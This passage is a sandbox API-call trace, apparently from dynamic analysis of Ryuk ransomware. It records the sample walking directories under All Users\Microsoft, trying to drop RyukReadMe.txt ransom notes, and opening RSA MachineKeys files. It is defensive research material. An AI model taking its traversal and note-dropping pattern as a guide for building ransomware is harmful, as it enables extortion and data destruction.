(hObject=0xffffffffffffffff) returned 0 [0159.509] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.509] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.509] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.509] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H", dwFileAttributes=0x80) returned 0 [0159.509] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.509] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.510] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.510] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.510] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.510] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D", dwFileAttributes=0x80) returned 0 [0159.510] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.510] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.510] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.510] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.510] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.510] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck", dwFileAttributes=0x80) returned 0 [0159.511] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.511] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.511] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.511] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0159.511] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.511] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", dwFileAttributes=0x80) returned 0 [0159.511] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.511] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.511] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.511] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0159.511] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0159.512] SetLastError (dwErrCode=0x0) [0159.512] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.520] GetLastError () returned 0x5 [0159.520] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0159.520] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.520] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.520] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.520] SetLastError (dwErrCode=0x0) [0159.520] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.520] GetLastError () returned 0x5 [0159.520] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.520] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.520] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.521] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.521] SetLastError (dwErrCode=0x0) [0159.521] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.521] GetLastError () returned 0x5 [0159.521] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.521] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.521] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.521] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.521] SetLastError (dwErrCode=0x0) [0159.521] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\assistance\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.521] GetLastError () returned 0x5 [0159.521] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.521] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.521] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.521] SetLastError (dwErrCode=0x0) [0159.521] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.521] GetLastError () returned 0x5 [0159.521] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.521] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.521] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.522] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.522] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.522] SetLastError (dwErrCode=0x0) [0159.522] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.522] GetLastError () returned 0x5 [0159.522] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.522] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.522] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.522] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.522] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.522] SetLastError (dwErrCode=0x0) [0159.522] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.522] GetLastError () returned 0x5 [0159.522] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.522] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.522] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.522] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.522] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.523] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.523] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.523] SetLastError (dwErrCode=0x0) [0159.523] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0159.523] GetLastError () returned 0xb7 [0159.523] CloseHandle (hObject=0x190) returned 1 [0159.523] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.523] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.523] SetLastError (dwErrCode=0x0) [0159.523] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.523] GetLastError () returned 0x5 [0159.523] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.523] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.523] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.523] SetLastError (dwErrCode=0x0) [0159.523] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.523] GetLastError () returned 0x5 [0159.523] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.523] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.523] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.524] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.524] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.524] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.524] SetLastError (dwErrCode=0x0) [0159.524] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\keys\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.524] GetLastError () returned 0x5 [0159.524] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.524] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.524] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.524] SetLastError (dwErrCode=0x0) [0159.524] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.524] GetLastError () returned 0x5 [0159.524] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.524] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.524] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.524] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.524] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.525] SetLastError (dwErrCode=0x0) [0159.525] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.525] GetLastError () returned 0x5 [0159.525] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.525] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.525] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.525] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.525] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.525] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.525] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\08e575673cce10c72090304839888e02_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", dwFileAttributes=0x80) returned 1 [0159.525] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\08e575673cce10c72090304839888e02_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\08e575673cce10c72090304839888e02_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0159.526] GetFileSizeEx (in: hFile=0xe4, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=338) returned 1 [0159.526] GetFileSizeEx (in: hFile=0xe4, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=338) returned 1 [0159.526] SetFilePointerEx (in: hFile=0xe4, liDistanceToMove=0x30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.526] ReadFile (in: hFile=0xe4, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0159.526] CloseHandle (hObject=0xe4) returned 1 [0159.526] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.527] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.527] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.527] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.527] SetLastError (dwErrCode=0x0) [0159.527] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0159.527] GetLastError () returned 0xb7 [0159.527] CloseHandle (hObject=0x190) returned 1 [0159.527] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.527] SetLastError (dwErrCode=0x0) [0159.527] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.527] GetLastError () returned 0x5 [0159.527] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.527] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.527] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0xffffffffffffffff [0159.527] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0159.527] SetLastError (dwErrCode=0x0) [0159.527] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.527] GetLastError () returned 0x5 [0159.527] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.528] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.528] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.528] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.528] SetLastError (dwErrCode=0x0) [0159.528] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.528] GetLastError () returned 0x5 [0159.528] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.528] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.528] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.528] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.528] SetLastError (dwErrCode=0x0) [0159.528] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.528] GetLastError () returned 0x5 [0159.528] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.528] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.528] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.528] SetLastError (dwErrCode=0x0) [0159.528] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.528] GetLastError () returned 0x5 [0159.528] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.529] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.529] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.529] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.529] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.529] SetLastError (dwErrCode=0x0) [0159.529] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.529] GetLastError () returned 0x5 [0159.529] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.529] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.529] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.529] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.529] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.529] SetLastError (dwErrCode=0x0) [0159.529] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 